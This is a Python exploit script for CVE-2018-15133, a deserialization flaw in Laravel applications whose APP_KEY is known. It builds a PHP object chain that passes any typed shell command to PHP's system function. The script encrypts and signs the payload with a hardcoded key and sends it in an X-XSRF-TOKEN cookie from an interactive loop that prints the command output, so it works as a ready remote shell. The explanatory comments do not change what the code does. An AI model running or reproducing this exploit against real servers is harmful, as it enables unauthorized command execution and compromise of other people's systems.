import hmac
import json
from base64 import b64encode, b64decode
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from phpserialize import *
from requests import session
ses = session()  # one requests Session reused by every request in the loop below
'''
CVE-2018-15133 implemented by Frank
pip3 install pycryptodome libphpserialize
'''
# Base64-encoded key that get_payload() uses for both the AES key and the
# HMAC key. Everything below depends on this value already being known, so
# keeping APP_KEY out of repositories/logs and rotating it whenever it may
# have been exposed is what closes this path; no other input is secret.
APP_KEY = 'P5tGTBKV2clEGWCWD7L5fSrhi8sfnX/cmHdqzx/fpVo='
# Base URL the interactive loop at the bottom sends each request to.
TARGET = 'http://localhost'
# write your own POP chain below
# Python stand-in for the PHP class Faker\Generator. `namespace` and the
# `protected_` attribute prefix come from the phpserialize star-import above
# and presumably drive how serialize() names the class and its properties —
# confirm against the library before relying on that.
@namespace('Faker')
class Generator:
    protected_formatters = {'dispatch': 'system'}
# Python stand-in for Illuminate\Broadcasting\PendingBroadcast; serialize()
# is called on an instance of this class in get_payload().
@namespace('Illuminate\\Broadcasting')
class PendingBroadcast:
    def __init__(self, cmd='whoami'):
        # cmd is an arbitrary caller-supplied string (get_payload forwards
        # whatever input() returned); it is stored verbatim.
        self.protected_event = cmd
        self.protected_events = Generator()
def get_payload(cmd):
    """Build an encrypted-cookie value in the {iv, value, mac} JSON layout Laravel's encrypter uses.

    The serialised PendingBroadcast(cmd) is padded to the AES block size
    (pad's default PKCS#7 style), AES-CBC encrypted under the key decoded
    from APP_KEY, and authenticated with HMAC-SHA256 over the base64 IV
    followed by the base64 ciphertext. The whole JSON document is then
    base64-encoded and returned as a str.

    Because the MAC is keyed by APP_KEY, a server whose key differs will
    reject the value at the MAC check; key secrecy is the only control here.

    Args:
        cmd: string stored in the serialised object's protected_event field.

    Returns:
        str: base64 of the JSON document described above.
    """
    key = b64decode(APP_KEY)  # raw key bytes, shared by AES and HMAC
    data = pad(serialize(PendingBroadcast(cmd)).encode(), 16)  # PHP serialisation, padded to 16-byte blocks
    # Fresh random IV; kept in its base64 form because the MAC is computed
    # over the base64 strings, not the raw bytes.
    iv = b64encode(Random.new().read(AES.block_size))
    res = b64encode(AES.new(key, AES.MODE_CBC, b64decode(iv)).encrypt(data))
    mac = hmac.new(key, iv + res, 'sha256').hexdigest()  # hex HMAC-SHA256 over iv||value
    payload = b64encode(json.dumps({
        'iv': iv.decode(), 'value': res.decode(), 'mac': mac
    }).encode()).decode()
    return payload
# Interactive loop: every line read from stdin is turned into a payload by
# get_payload() and sent to TARGET in a cookie named X-XSRF-TOKEN (the bare
# string below records that a request header of the same name is the more
# usual placement). The first 10 characters of the response body are
# dropped before printing; the reason for 10 is not given here.
while True:
    '''
under most circumstances, this should be
headers={
'X-XSRF-TOKEN': get_payload(input())
}
'''
    print(ses.get(TARGET, cookies={
        'X-XSRF-TOKEN': get_payload(input())
    }).text[10:])